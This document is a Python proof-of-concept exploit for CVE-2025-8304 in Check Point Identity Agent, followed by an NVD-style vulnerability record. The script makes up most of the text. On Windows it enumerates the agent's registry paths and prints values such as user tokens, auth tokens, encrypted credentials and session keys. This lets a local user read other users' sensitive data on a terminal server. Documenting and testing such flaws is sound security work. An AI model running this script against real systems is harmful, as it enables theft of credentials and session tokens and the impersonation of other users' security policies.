CVE-2025-8304

# CVE-2025-8304 PoC - Check Point Identity Agent Registry Information Disclosure # This PoC demonstrates the information disclosure vulnerability in Check Point Identity Agent # Author: Security Researcher # Date: 2025-12-22 import winreg import os import sys def query_registry_key(hive, path, key_name): """ Query a specific registry key value Args: hive: Windows registry hive (e.g., HKEY_LOCAL_MACHINE) path: Registry key path key_name: Name of the value to query Returns: Value data if exists, None otherwise """ try: reg_key = winreg.OpenKey(hive, path, 0, winreg.KEY_READ) value, _ = winreg.QueryValueEx(reg_key, key_name) winreg.CloseKey(reg_key) return value except WindowsError: return None def enumerate_identity_agent_keys(): """ Enumerate Check Point Identity Agent registry keys that may contain sensitive information Common registry paths for Check Point Identity Agent """ sensitive_paths = [ r'SOFTWARE\CheckPoint\IdentityAgent', r'SOFTWARE\WOW6432Node\CheckPoint\IdentityAgent', r'SYSTEM\CurrentControlSet\Services\CheckPointIdentityAgent', r'SOFTWARE\Policies\CheckPoint\IdentityAgent' ] sensitive_keys = [ 'PolicyRules', 'UserToken', 'AuthToken', 'SecurityPolicy', 'UserPolicy', 'EncryptedCredentials', 'SessionKey' ] results = {} for path in sensitive_paths: path_results = {} for key in sensitive_keys: value = query_registry_key(winreg.HKEY_LOCAL_MACHINE, path, key) if value: path_results[key] = value if path_results: results[path] = path_results return results def main(): print("[*] CVE-2025-8304 PoC - Check Point Identity Agent Registry Info Disclosure") print("[*] Target: Check Point Identity Agent on Terminal Server") print("=" * 70) # Check if running on Windows if sys.platform != 'win32': print("[-] This PoC only works on Windows systems") return print("\n[*] Enumerating Check Point Identity Agent registry keys...") sensitive_data = enumerate_identity_agent_keys() if sensitive_data: print("\n[!] Sensitive information found in registry:") print("-" * 70) for path, keys in sensitive_data.items(): print(f"\n[+] Registry Path: {path}") for key_name, key_value in keys.items(): print(f" |_ {key_name}: {key_value}") print("\n" + "=" * 70) print("[!] WARNING: This information can be used to claim other users' security policies") print("[*] PoC completed - vulnerability confirmed") else: print("[-] No sensitive registry keys found or target not vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-8304", "sourceIdentifier": "[email protected]", "published": "2025-12-22T08:15:45.947", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being accessible in the Windows Registry keys for Check Point Identity Agent running on a Terminal Server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.checkpoint.com/results/sk/sk184263", "source": "[email protected]"}]}}